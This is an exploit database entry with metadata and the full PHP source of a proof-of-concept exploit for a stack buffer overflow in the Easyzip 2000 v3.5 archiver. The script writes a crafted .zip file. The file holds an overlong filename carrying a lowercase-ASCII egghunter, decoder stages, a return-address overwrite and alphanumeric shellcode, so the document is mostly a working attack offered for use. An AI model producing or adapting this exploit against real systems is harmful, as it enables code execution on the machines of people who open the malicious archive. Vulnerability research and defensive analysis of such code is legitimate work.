Easyzip 2000 v3.5 (.zip) 0day stack buffer overflow PoC exploit

vendor:

Easyzip 2000

by:

mr_me

7.5

CVSS

HIGH

Stack Buffer Overflow

CWE

Product Name: Easyzip 2000

Affected Version From: Easyzip 2000 v3.5

Affected Version To: Easyzip 2000 v3.5

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP sp3

Easyzip 2000 v3.5 (.zip) 0day stack buffer overflow PoC exploit

This is a proof-of-concept exploit for a stack buffer overflow vulnerability in Easyzip 2000 v3.5. The exploit allows for code execution with an ASCII lowercase and payload space of less than 400 bytes.

Mitigation:

Upgrade to a patched version of Easyzip 2000 or use an alternative software

Source

Exploit-DB raw data:

<?php
/*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Easyzip 2000 v3.5 (.zip) 0day stack buffer overflow PoC exploit
Author: mr_me - http://net-ninja.net/
Download: http://www.thefreesite.com/ezip35.exe
Platform: Windows XP sp3
Advisory: http://www.corelan.be:8800/advisories.php?id=10-032
Greetz to: Corelan Security Team
http://www.corelan.be:8800/index.php/security/corelan-team-members/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Script provided 'as is', without any warranty.
Use for educational purposes only.
Do not use this code to do anything illegal !
 
Note : you are not allowed to edit/modify this code.
If you do, Corelan cannot be held responsible for any damages this may cause.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ascii lowercase and payload space < 400 bytes, yet we still get code execution.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*/
 
// local file header
$lf_header = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00";
 
// central directory file header
$cdf_header = "\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";
 
// end of central directory record
$efcdr_record = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00";

// filename
$_____name = "\x6D\x72\x5F\x6D\x65\x73\x5F\x73\x65\x63\x72\x65\x63\x74".
"\x5F\x70\x61\x73\x73\x77\x6F\x72\x64\x73\x2E\x74\x78\x74";
 
// corelan security team msgbox
$_____sc = "VTX10X41PZ41H4A4K1TG91TGFVTZ32PZNBFZDWE02DWF0D71DJEON4F1W9M490R0P08654E2".
"M9Y2F64346K5K450115MN2G0N0B0L5C5DKO106737KO9W8P0O2L1L0P184E3U0Q8P1G3L5O9R601E671O9W".
"343QOO113RJOLK8M640M1K3WOL1W4Y2O613V2I4K5C0R0S0PMO2O3W2O8K9R1Z1K0S1H3PLMKM5KKK8M0S4".
"JJL15612J1267KM2K4D903K03";

// lowercase ascii encoded egghunter
$eh = "j314d34djq34djk34d1431s11s7j314d34dj234dkms502ds5o0d35upj51g4241n20b0d5".
"225737445m51c5k5dk4j49b591e7b5k4k385bk2j55bk59359927";
 
$decoderStage1 = "\x25\x4a\x4d\x4e\x55\x25\x35\x08\x31\x2a".
"\x2d\x49\x49\x49\x5e\x2d\x4a\x49\x4a\x5e\x2d\xc1\xc1\xc1\x5f";

$decoderStage2 = "\x25\x4A\x4d\x4e\x55\x25\x10\x10\x31\x10".
"\x2d\x2a\x69\x37\xc1\x2d\x2a\x69\x36\xc1\x2d\x2b\x6a\xb1\x9b";

$align = "\x60".str_repeat("\x5d",7);

$___exploit = $_____name.str_repeat("\x61",249).$eh.str_repeat("\x61",144-strlen($eh))."\x60".
str_repeat("\x5b",8).$decoderStage1.$align.$decoderStage2.$align."\x98\x8e\x89\xf1\x64\x64".
"\x16\x32\x40\x00";
$___exploit .= str_repeat("\x61",2000-strlen($___exploit))."\x57\x30\x30\x54\x57\x30\x30\x54".$_____sc.
str_repeat("\x61",2056-strlen($_____sc))."\x2e\x74\x78\x74";
            
$_____b00m = $lf_header.$___exploit.$cdf_header.$___exploit.$efcdr_record;
file_put_contents("cst-easyzip.zip",$_____b00m);
?>